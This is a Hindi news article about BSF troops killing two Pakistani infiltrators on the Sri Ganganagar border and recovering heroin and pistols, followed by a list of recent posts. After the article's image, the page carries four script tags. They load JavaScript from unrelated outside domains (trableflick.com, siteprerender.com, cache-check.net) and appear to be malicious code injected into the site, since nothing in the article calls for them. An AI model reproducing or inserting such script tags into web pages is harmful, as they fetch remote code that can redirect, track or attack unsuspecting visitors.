Categories: इंडिया

राजस्थानः श्रीगंगानगर से लगती अंतरराष्ट्रीय सीमा पर BSF के जवानों ने ढेर किए 2 घुसपैठिए

<p>राजस्थान के सीमावर्ती श्रीगंगानगर से लगती अंतरराष्ट्रीय सीमा पर बीएसएफ की ओर से बड़ी कार्रवाई को अंजाम दिया गया है। जानकारी के अनुसार बीती देर रात करीब 1 बजे जवानों को सीमा पर तारबंदी के पास हलचल दिखाई दी। बीएसएफ जवानों द्वारा ललकारे जाने पर दो&nbsp; संदिग्ध व्यक्ति मौके पर वापस पाकिस्तान सीमा की ओर भागने लगे। इस पर जवानों ने गोलियां चला दी। सीमा सुरक्षा बल की 91 बटालियन के सजग जवानों ने पाकिस्तान की सीमा से भारतीय सीमा में घुसे दो पाकिस्तानी घुसपैठियों को मार गिराया है।</p>

<p>बताया जा रहा है कि BSF की सीमा चौकी ख्याली पर पहले जवानों की ओर से घुसपैठियों को चेतावनी दी गई। इसके बाद नहीं मानने पर जवानों ने उन्हें मार गिराया।&nbsp; लगातार प्रदेश के सीमावर्ती इलाकों से मादक पदार्थों के तस्करी की सूचना सामने आती रही है। बीएसएफ की ओर से घुसपैठियों को ढ़ेर करने के बाद सर्च ऑपरेशन चलाया गया, जिसमें कथित तौर पर करीब 10 पैकेट हेरोइन के मिलने की सूचना मिली है। साथ ही दो पिस्तौलें की बरामदगी को लेकर भी जानकारी सामने आई हैं।</p>

<p>जानकारी के अनुसार राजस्थान के रास्ते पाकिस्तानी घुसपैठ की सूचना के बाद बीएसएफ पूरी तरह अलर्ट है। सीमा पर सर्च ऑपरेशन जारी है। इसके साथ ही बीएसएफ और पुलिस के उच्च अधिकारी मौके पर पहुंच गए हैं। मामले की जांच की जा रही है, तस्करी के अलावा अन्य पहलूओं को भी खंगालने की कोशिश की जा रही है। साथ ही पिस्तौल की बरामदगी भी कई तरह के सवाल खड़े कर रही है।</p>

<p><img src=”/media/gallery/images/image(1159).png” style=”height:600px; width:358px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1599630287963″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

5 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

5 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

6 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

6 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

7 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

7 hours ago